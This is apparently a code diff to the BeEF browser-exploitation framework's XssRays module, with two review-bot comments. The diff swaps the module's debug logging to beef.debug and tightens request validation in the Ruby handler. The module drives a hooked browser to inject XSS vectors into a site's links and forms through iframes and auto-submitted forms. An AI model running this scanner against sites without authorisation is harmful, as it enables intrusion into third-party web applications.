Use beef.debug for XSSrays debugging
@@ -41,9 +41,8 @@ beef.net.xssrays = {
|
||||
xssraysScanId : 0,
|
||||
hookedBrowserSession: "",
|
||||
beefRayUrl: "",
|
||||
// the 3 following variables are overridden via BeEF, in the Scan Config XssRays sub-tab.
|
||||
// the following variables are overridden via BeEF, in the Scan Config XssRays sub-tab.
|
||||
crossDomain: false,
|
||||
debug:false,
|
||||
cleanUpTimeout:5000,
|
||||
|
||||
//browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
|
||||
@@ -98,35 +97,27 @@ beef.net.xssrays = {
|
||||
break;
|
||||
default : result = false;
|
||||
}
|
||||
beef.net.xssrays.printDebug("==== browser_id ==== [" + browser_id + "], result [" + result + "]");
|
||||
beef.debug("==== browser_id ==== [" + browser_id + "], result [" + result + "]");
|
||||
return result;
|
||||
},
|
||||
|
||||
// util function. Print string to the console only if the debug flag is on and the browser is not IE.
|
||||
printDebug:function(log) {
|
||||
if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
|
||||
beef.debug("[XssRays] " + log);
|
||||
}
|
||||
},
|
||||
|
||||
// main function, where all starts :-)
|
||||
startScan:function(xssraysScanId, hookedBrowserSession, beefUrl, crossDomain, timeout, debug) {
|
||||
startScan:function(xssraysScanId, hookedBrowserSession, beefUrl, crossDomain, timeout) {
|
||||
|
||||
this.xssraysScanId = xssraysScanId;
|
||||
this.hookedBrowserSession = hookedBrowserSession;
|
||||
this.beefRayUrl = beefUrl + '/' + this.handler;
|
||||
beef.net.xssrays.printDebug("Using [" + this.beefRayUrl + "] handler to contact back BeEF");
|
||||
beef.debug("Using [" + this.beefRayUrl + "] handler to contact back BeEF");
|
||||
this.crossDomain = crossDomain;
|
||||
this.cleanUpTimeout = timeout;
|
||||
this.debug = debug;
|
||||
|
||||
this.scan();
|
||||
beef.net.xssrays.printDebug("Starting scan");
|
||||
beef.debug("Starting scan");
|
||||
this.runJobs();
|
||||
},
|
||||
complete:function() {
|
||||
if (beef.net.xssrays.completed == beef.net.xssrays.totalConnections) {
|
||||
beef.net.xssrays.printDebug("COMPLETE, notifying BeEF for scan id [" + beef.net.xssrays.xssraysScanId + "]");
|
||||
beef.debug("COMPLETE, notifying BeEF for scan id [" + beef.net.xssrays.xssraysScanId + "]");
|
||||
$j.get(this.beefRayUrl, { hbsess: this.hookedBrowserSession, raysid: this.xssraysScanId, action: "finish"} );
|
||||
} else {
|
||||
this.getNextJob();
|
||||
@@ -134,7 +125,7 @@ beef.net.xssrays = {
|
||||
},
|
||||
getNextJob:function() {
|
||||
var that = this;
|
||||
beef.net.xssrays.printDebug("getNextJob - this.stack.length [" + this.stack.length + "]");
|
||||
beef.debug("getNextJob - this.stack.length [" + this.stack.length + "]");
|
||||
if (this.stack.length > 0) {
|
||||
var func = that.stack.shift();
|
||||
if (func) {
|
||||
@@ -158,21 +149,19 @@ beef.net.xssrays = {
|
||||
return this;
|
||||
},
|
||||
scanLinks: function() { //TODO: add depth crawling for links that are in the same domain
|
||||
beef.net.xssrays.printDebug("scanLinks, document.links.length [" + document.links.length + "]");
|
||||
beef.debug("scanLinks, document.links.length [" + document.links.length + "]");
|
||||
for (var i = 0; i < document.links.length; i++) {
|
||||
var url = document.links[i];
|
||||
|
||||
if ((url.hostname.toString() === location.hostname.toString() || this.crossDomain) && (location.protocol === 'http:' || location.protocol === 'https:')) {
|
||||
beef.net.xssrays.printDebug("Starting scanning URL [" + url + "]\n url.href => " + url.href +
|
||||
beef.debug("Starting scanning URL [" + url + "]\n url.href => " + url.href +
|
||||
"\n url.pathname => " + url.pathname + "\n" +
|
||||
"url.search => " + url.search + "\n");
|
||||
this.xss({href:url.href, pathname:url.pathname, hostname:url.hostname, port: url.port, protocol: location.protocol,
|
||||
search:url.search, type: 'url'});//scan each link & param
|
||||
} else {
|
||||
if (this.debug) {
|
||||
beef.net.xssrays.printDebug('Scan is not Cross-domain. URLS\nurl :' + url.hostname.toString());
|
||||
beef.net.xssrays.printDebug('\nlocation :' + location.hostname.toString());
|
||||
}
|
||||
beef.debug('Scan is not Cross-domain. URLS\nurl :' + url.hostname.toString());
|
||||
beef.debug('\nlocation :' + location.hostname.toString());
|
||||
}
|
||||
}
|
||||
if (location.search.length > 0) {
|
||||
@@ -201,7 +190,7 @@ beef.net.xssrays = {
|
||||
for (var i = 0; i < this.vectors.length; i++) {
|
||||
// skip the current vector if it's not compatible with the hooked browser
|
||||
if (!this.checkBrowser(i)){
|
||||
beef.net.xssrays.printDebug("Skipping vector [" + this.vectors[i].name + "] because it's not compatible with the current browser.");
|
||||
beef.debug("Skipping vector [" + this.vectors[i].name + "] because it's not compatible with the current browser.");
|
||||
continue;
|
||||
}
|
||||
if (!this.vectors[i].url) {
|
||||
@@ -209,19 +198,19 @@ beef.net.xssrays = {
|
||||
}
|
||||
if (this.vectors[i].url) {
|
||||
if (target.port == null || target.port == "") {
|
||||
beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
|
||||
beef.debug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
|
||||
this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], params, true);//params
|
||||
} else {
|
||||
beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
|
||||
beef.debug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
|
||||
this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], params, true);//params
|
||||
}
|
||||
}
|
||||
if (this.vectors[i].path) {
|
||||
if (target.port == null || target.port == "") {
|
||||
beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
|
||||
beef.debug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
|
||||
this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], null, true);//paths
|
||||
} else {
|
||||
beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
|
||||
beef.debug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
|
||||
this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], null, true);//paths
|
||||
}
|
||||
}
|
||||
@@ -244,31 +233,29 @@ beef.net.xssrays = {
|
||||
|
||||
// skip the current vector if it's not compatible with the hooked browser
|
||||
if (!this.checkBrowser(k)){
|
||||
beef.net.xssrays.printDebug("Skipping vector [" + this.vectors[i].name + "] because it's not compatible with the current browser.");
|
||||
beef.debug("Skipping vector [" + this.vectors[i].name + "] because it's not compatible with the current browser.");
|
||||
continue;
|
||||
}
|
||||
if (!this.vectors[k].form) {
|
||||
continue;
|
||||
}
|
||||
if (!this.crossDomain && (this.host(action).toString() != this.host(location.toString()))) {
|
||||
if (this.debug) {
|
||||
beef.net.xssrays.printDebug('Scan is not Cross-domain. FormPost\naction :' + this.host(action).toString());
|
||||
beef.net.xssrays.printDebug('location :' + this.host(location));
|
||||
}
|
||||
beef.debug('Scan is not Cross-domain. FormPost\naction :' + this.host(action).toString());
|
||||
beef.debug('location :' + this.host(location));
|
||||
continue;
|
||||
}
|
||||
if (this.vectors[k].form) {
|
||||
if (method === 'GET') {
|
||||
beef.net.xssrays.printDebug("Starting XSS on FORM action params, GET method of [" + action + "], params [" + paramsstring + "]");
|
||||
beef.debug("Starting XSS on FORM action params, GET method of [" + action + "], params [" + paramsstring + "]");
|
||||
this.run(action, method, this.vectors[k], params, true);//params
|
||||
}
|
||||
else {
|
||||
beef.net.xssrays.printDebug("Starting XSS on FORM action params, POST method of [" + action + "], params [" + paramsstring + "]");
|
||||
beef.debug("Starting XSS on FORM action params, POST method of [" + action + "], params [" + paramsstring + "]");
|
||||
this.run(action, method, this.vectors[k], params, false);//params
|
||||
}
|
||||
}
|
||||
if (this.vectors[k].path) {
|
||||
beef.net.xssrays.printDebug("Starting XSS on FORM action URI PATH of [" + action + "], ");
|
||||
beef.debug("Starting XSS on FORM action URI PATH of [" + action + "], ");
|
||||
this.run(action, 'GET', this.vectors[k], null, true);//paths
|
||||
}
|
||||
}
|
||||
@@ -305,11 +292,11 @@ beef.net.xssrays = {
|
||||
// this check is needed only when checking for URI path injections
|
||||
if(url[url.length - 1] == "/" && params == null){
|
||||
url = url.substring(0, url.length - 2);
|
||||
beef.net.xssrays.printDebug("Remove last / from url. New url [" + url + "]");
|
||||
beef.debug("Remove last / from url. New url [" + url + "]");
|
||||
}
|
||||
|
||||
beef.net.xssrays.uniqueID++;
|
||||
beef.net.xssrays.printDebug('Processing vector [' + vector.name + "], URL [" + url + "]");
|
||||
beef.debug('Processing vector [' + vector.name + "], URL [" + url + "]");
|
||||
var poc = '';
|
||||
var pocurl = url;
|
||||
var exploit = '';
|
||||
@@ -400,7 +387,7 @@ beef.net.xssrays = {
|
||||
iframe.src = url;
|
||||
}
|
||||
document.body.appendChild(iframe);
|
||||
beef.net.xssrays.printDebug("Creating XSS iFrame with src [" + iframe.src + "], id[" + iframe.id + "], time [" + iframe.time + "]");
|
||||
beef.debug("Creating XSS iFrame with src [" + iframe.src + "], id[" + iframe.id + "], time [" + iframe.time + "]");
|
||||
} else if (method === 'POST') {
|
||||
/*
|
||||
* ++++++++++ check for XSS in body parameters (POST) ++++++++++
|
||||
@@ -410,7 +397,7 @@ beef.net.xssrays = {
|
||||
pocurl = action + "?";
|
||||
paramsPos = 0;
|
||||
|
||||
beef.net.xssrays.printDebug("Form action [" + action + "]");
|
||||
beef.debug("Form action [" + action + "]");
|
||||
for (var i in params) {
|
||||
if (params.hasOwnProperty(i)) {
|
||||
|
||||
@@ -426,17 +413,17 @@ beef.net.xssrays = {
|
||||
|
||||
exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
|
||||
form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';
|
||||
beef.net.xssrays.printDebug("form param[" + i + "] = " + params[i].toString());
|
||||
beef.debug("form param[" + i + "] = " + params[i].toString());
|
||||
|
||||
paramsPos++;
|
||||
}
|
||||
}
|
||||
form += '<\/form>';
|
||||
document.body.appendChild(iframe);
|
||||
beef.net.xssrays.printDebug("Creating form [" + form + "]");
|
||||
beef.debug("Creating form [" + form + "]");
|
||||
iframe.contentWindow.document.writeln(form);
|
||||
iframe.contentWindow.document.writeln('<script>document.createElement("form").submit.apply(document.forms[0]);<\/script>');
|
||||
beef.net.xssrays.printDebug("Submitting form");
|
||||
beef.debug("Submitting form");
|
||||
}
|
||||
|
||||
});
|
||||
@@ -452,15 +439,17 @@ beef.net.xssrays = {
|
||||
for (var i = 0; i < document.getElementsByTagName('iframe').length; i++) {
|
||||
var iframe = document.getElementsByTagName('iframe')[i];
|
||||
numOfConnections++;
|
||||
//beef.net.xssrays.printDebug("runJobs parseInt(this.timestamp()) [" + parseInt(beef.net.xssrays.timestamp()) + "], parseInt(iframe.time) [" + parseInt(iframe.time) + "]");
|
||||
//beef.debug("runJobs parseInt(this.timestamp()) [" + parseInt(beef.net.xssrays.timestamp()) + "], parseInt(iframe.time) [" + parseInt(iframe.time) + "]");
|
||||
if (parseInt(beef.net.xssrays.timestamp()) - parseInt(iframe.time) > 5) {
|
||||
try{
|
||||
if (iframe) {
|
||||
beef.net.xssrays.complete();
|
||||
beef.net.xssrays.printDebug("RunJobs cleaning up iFrame [" + iframe.id + "]");
|
||||
beef.debug("RunJobs cleaning up iFrame [" + iframe.id + "]");
|
||||
document.body.removeChild(iframe);
|
||||
}
|
||||
}catch(e){beef.net.xssrays.printDebug("Exception [" + e.toString() + "] when cleaning iframes.")}
|
||||
}catch(e){
|
||||
beef.debug("Exception [" + e.toString() + "] when cleaning iframes.")
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
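Review bot: In the form-scanning hunk (`@@ -244,31 +233,29 @@`) the rewritten skip message still reads `this.vectors[i].name`, although the surrounding code indexes the vector list with `k` (`this.checkBrowser(k)`, `this.vectors[k].form`). The argument string is built before `beef.debug` decides whether to print, so if `i` does not name a valid vector at that point the property access throws and stops the loop; at best the log names the wrong vector. The line should read `beef.debug("Skipping vector [" + this.vectors[k].name + "] because it's not compatible with the current browser.");`. The enclosing function starts and ends outside the hunk, so what `i` holds there is inferred rather than visible.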
@@ -35,7 +35,6 @@ module BeEF
|
||||
beefurl = BeEF::Core::Server.instance.url
|
||||
cross_domain = xs.cross_domain
|
||||
timeout = xs.clean_timeout
|
||||
debug = config.get("beef.extension.xssrays.js_console_logs")
|
||||
|
||||
ws = BeEF::Core::Websocket::Websocket.instance
|
||||
|
||||
@@ -51,7 +50,7 @@ module BeEF
|
||||
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
// See the file \'doc/COPYING\' for copying permission
|
||||
//', "")
|
||||
add_to_body xs.id, hb.session, beefurl, cross_domain, timeout, debug
|
||||
add_to_body xs.id, hb.session, beefurl, cross_domain, timeout
|
||||
|
||||
if config.get("beef.extension.evasion.enable")
|
||||
evasion = BeEF::Extension::Evasion::Evasion.instance
|
||||
@@ -62,19 +61,19 @@ module BeEF
|
||||
# If we use XHR-polling, add the component to the main hook file
|
||||
else
|
||||
build_missing_beefjs_components 'beef.net.xssrays'
|
||||
add_to_body xs.id, hb.session, beefurl, cross_domain, timeout, debug
|
||||
add_to_body xs.id, hb.session, beefurl, cross_domain, timeout
|
||||
end
|
||||
|
||||
print_debug("[XSSRAYS] Adding XssRays to the DOM. Scan id [#{xs.id}], started at [#{xs.scan_start}], cross domain [#{cross_domain}], clean timeout [#{timeout}], js console debug [#{debug}].")
|
||||
print_debug("[XSSRAYS] Adding XssRays to the DOM. Scan id [#{xs.id}], started at [#{xs.scan_start}], cross domain [#{cross_domain}], clean timeout [#{timeout}].")
|
||||
|
||||
end
|
||||
|
||||
def add_to_body(id, session, beefurl, cross_domain, timeout, debug)
|
||||
def add_to_body(id, session, beefurl, cross_domain, timeout)
|
||||
config = BeEF::Core::Configuration.instance
|
||||
|
||||
req = %Q{
|
||||
beef.execute(function() {
|
||||
beef.net.xssrays.startScan('#{id}', '#{session}', '#{beefurl}', #{cross_domain}, #{timeout}, #{debug});
|
||||
beef.net.xssrays.startScan('#{id}', '#{session}', '#{beefurl}', #{cross_domain}, #{timeout});
|
||||
});
|
||||
}
|
||||
|
||||
|
||||
@@ -11,5 +11,3 @@ beef:
|
||||
authors: ["antisnatchor"]
|
||||
clean_timeout: 3000
|
||||
cross_domain: true
|
||||
# set js_console_logs to false when using BeEF in production (also because IE < 9 doesn't support the console object)
|
||||
js_console_logs: true
|
||||
|
||||
@@ -17,22 +17,30 @@ module BeEF
|
||||
# verify if the request contains the hook token
|
||||
# raise an error if it's null or not found in the DB
|
||||
beef_hook = params[:hbsess] || nil
|
||||
(print_error "[XSSRAYS] Invalid beefhook id: the hooked browser cannot be found in the database";return) if beef_hook.nil? || HB.first(:session => beef_hook) == nil
|
||||
|
||||
if beef_hook.nil? || HB.first(:session => beef_hook).nil?
|
||||
print_error "[XSSRAYS] Invalid beef hook ID: the hooked browser cannot be found in the database"
|
||||
return
|
||||
end
|
||||
|
||||
# verify the specified ray ID is valid
|
||||
rays_scan_id = params[:raysid] || nil
|
||||
(print_error "[XSSRAYS] Raysid is null";return) if rays_scan_id.nil?
|
||||
if rays_scan_id.nil? || !BeEF::Filters::nums_only?(rays_scan_id)
|
||||
print_error "[XSSRAYS] Invalid ray ID"
|
||||
return
|
||||
end
|
||||
|
||||
if params[:action] == 'ray'
|
||||
case params[:action]
|
||||
when 'ray'
|
||||
# we received a ray
|
||||
parse_rays(rays_scan_id)
|
||||
when 'finish'
|
||||
# we received a notification for finishing the scan
|
||||
finalize_scan(rays_scan_id)
|
||||
else
|
||||
if params[:action] == 'finish'
|
||||
# we received a notification for finishing the scan
|
||||
finalize_scan(rays_scan_id)
|
||||
else
|
||||
#invalid action
|
||||
print_error "[XSSRAYS] Invalid action";return
|
||||
end
|
||||
# invalid action
|
||||
print_error "[XSSRAYS] Invalid action"
|
||||
return
|
||||
end
|
||||
|
||||
headers 'Pragma' => 'no-cache',
|
||||
@@ -58,7 +66,7 @@ module BeEF
|
||||
)
|
||||
xssrays_detail.save
|
||||
end
|
||||
print_info("[XSSRAYS] Scan id [#{xssrays_scan.id}] received ray [ip:#{hooked_browser.ip.to_s}], hooked domain [#{hooked_browser.domain.to_s}]")
|
||||
print_info("[XSSRAYS] Scan id [#{xssrays_scan.id}] received ray [ip:#{hooked_browser.ip}], hooked domain [#{hooked_browser.domain}]")
|
||||
print_debug("[XSSRAYS] Ray info: \n #{request.query_string}")
|
||||
end
|
||||
|
||||
|
||||
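Review bot: In the first hunk `hbsess` and `raysid` are each validated on their own, but nothing visible checks that the scan named by `raysid` belongs to the browser identified by `hbsess` before `parse_rays(rays_scan_id)` or `finalize_scan(rays_scan_id)` runs. Both methods receive only the scan id and their bodies are largely outside the hunks, so whether they make that comparison is not visible here. If they do not, a request carrying any valid session value could add results to, or close, a scan that was issued to a different browser. Keeping the record returned by `HB.first(:session => beef_hook)` and passing it along would let the two be compared; a comment such as `# the scan must belong to the hooked browser that sent this request` above the dispatch would document the expectation.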